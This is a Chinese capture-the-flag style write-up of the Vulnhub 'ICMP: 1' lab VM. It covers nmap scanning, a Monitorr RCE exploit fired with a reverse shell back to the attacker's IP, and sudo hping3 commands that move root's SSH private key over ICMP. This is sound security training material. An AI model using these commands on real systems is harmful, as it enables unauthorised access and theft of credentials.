首页 > 其他分享 >Vulnhub: ICMP: 1靶机

Vulnhub: ICMP: 1靶机

时间:2023-08-21 18:13:00浏览次数:42  
标签:111.208 hping3 -- sudo 192.168 Vulnhub 靶机 ICMP root

kali:192.168.111.111

靶机:192.168.111.208

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.208

image

80端口的cms为Monitorr 1.7.6m

image

搜索发现该版本的cms存在远程代码执行

searchsploit monitorr

image

漏洞利用

nc本地监听,再执行exp

python3 48980.py http://192.168.111.208/mon/ 192.168.111.111 4444

image

提权

在fox用户家目录查看reminder提示crypt.php

image

crypt.phpdevel目录中

image

BUHNIJMONIBUVCYTTYVGBUHJNI为fox用户的密码

image

fox用户sudo权限

image

开启两个终端连接目标ssh,利用hping3读取root用户的私钥文件

image

image

#发送端
sudo -u root hping3 --icmp 127.0.0.1 --data 5000 --sign signature --file /root/.ssh/id_rsa

#接收端
sudo -u root hping3 --icmp 127.0.0.1 --listen signature --safe

image

读取到的私钥保存到本地,再利用私钥登录root

image

标签:111.208,hping3,--,sudo,192.168,Vulnhub,靶机,ICMP,root
From: https://www.cnblogs.com/ctostm/p/17646719.html

相关文章

  • 【渗透测试】 Vulnhub JANGOW: 1.0.1
    渗透环境攻击机:   IP: 192.168.149.128(Kali)靶机:     IP:192.168.149.129靶机下载地址:https://www.vulnhub.com/entry/jangow-101,754/进行渗透一、获取IP及端口信息使用nmap扫描同网段IP,如果使用的是VMware可能出现扫描不到的情况,需要在靶机的恢复模式里......
  • Vulnhub: DriftingBlues: 2靶机
    kali:192.168.111.111靶机:192.168.111.207信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.20780端口的/blog目录为wordpresswpscan收集wordpress用户和爆破密码wpscan--urlhttp://driftingblues.box/blog-eu,ap--plugins-detectionmi......
  • 靶机 red hat enterprise linux 从收集到提权
    前言:时间2022年5月22日,在B/S架构上通过用户名dus2进行密码爆破后得到了dus2,拿到了普通用户的shell(权限很低),最终目的拿到root的shell来破环整个服务器。linux提权思路归纳   首先开始信息收集,登陆普通用户dsu2       uname-a                    ......
  • DC-9靶机
    靶机下载地址:http://www.five86.com/downloads/DC-9.zip1.查看kali靶机ip2.nmap192.168.137.0/24     nmap扫描同一网络段的靶机ip地址3.访问靶机192.168.137.154   访问80端口4.查看网站内容信息,在DisplayallRecords里有一些用户信息第三个Search,搜索拿......
  • 国标GB28181视频监控平台EasyGBS国标平台无法播放,抓包返回ICMP的问题解决方案
    国标GB28181视频平台EasyGBS是基于国标GB/T28181协议的行业内安防视频流媒体能力平台,可实现的视频功能包括:实时监控直播、录像、检索与回看、语音对讲、云存储、告警、平台级联等功能。国标GB28181视频监控平台部署简单、可拓展性强,支持将接入的视频流进行全终端、全平台分发,分发的......
  • 国标GB28181视频平台EasyGBS视频监控平台无法播放,抓包返回ICMP排查过程
    国标GB28181视频平台EasyGBS是基于国标GB/T28181协议的行业内安防视频流媒体能力平台,可实现的视频功能包括:实时监控直播、录像、检索与回看、语音对讲、云存储、告警、平台级联等功能。国标GB28181视频监控平台部署简单、可拓展性强,支持将接入的视频流进行全终端、全平台分发,分发......
  • 【Vulnhub】OSCP
    靶场介绍靶场下载地址:https://www.vulnhub.com/entry/infosec-prep-oscp,508/靶场难度:容易kali:192.168.11.5靶机:192.168.11.13信息收集使用nmap扫描靶机开放的端口及服务nmap-A-T4-sS192.168.11.13可以看到靶机开启了22和80端口使用dirb扫描一下目录扫出来一个r......
  • Vulnhub: MoneyBox: 1靶机
    kali:192.168.111.111靶机:192.168.111.194信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.194ftp匿名登录发现trytofind.jpg目录爆破发现blogs目录gobusterdir-uhttp://192.168.111.194-w/usr/share/wordlists/dirbuster/directory-li......
  • Vulnhub: DriftingBlues: 3靶机
    kali:192.168.111.111靶机:192.168.111.192信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.192查看robots.txt得到提示访问eventadmins提示littlequeenofspades.html查看littlequeenofspades.html源码base64解密后提示adminsfixit.php......
  • ICMP
    ICMPICMP(InternetControlMessageProtocol)协议:互联网控制报文协议。ICMP是网络探测与回馈机制的一种ICMP格式ICMP报文由ICMP头和数据(无用数据)组成ICMP主要类型字段:8:ping请求0:ping应答3:目标主机不可达11、TTL超时当主机ping别人时,会发送ICMP报文,报文里的ICMP类型为8......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99